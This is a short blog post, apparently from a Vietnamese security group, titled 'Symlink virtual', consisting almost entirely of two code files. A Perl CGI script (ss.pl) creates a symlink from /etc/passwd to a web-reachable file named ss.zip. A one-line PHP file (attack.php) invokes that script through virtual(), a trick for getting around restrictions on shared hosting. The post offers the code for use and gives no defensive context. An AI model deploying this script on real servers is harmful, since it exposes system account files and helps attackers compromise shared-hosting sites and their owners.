J2TEAM Security: A must-have extension for Chrome users. Install now!

Symlink virtual

ss.pl Code:
Code:
#!/usr/bin/perl -w
$target="/etc/passwd";  
$distension ="ss.zip"; 
print "Content-type: text/html\n\n";
print '<body text="#C0C0C0" bgcolor="#000000">';
$symlink = symlink($target,$distension);
if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; } 
else { print "Cannot Symlink File or File $distension Already Exists . . ."; }
attack.php Code:
Code:
<?php virtual("./ss.pl"); ?>
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!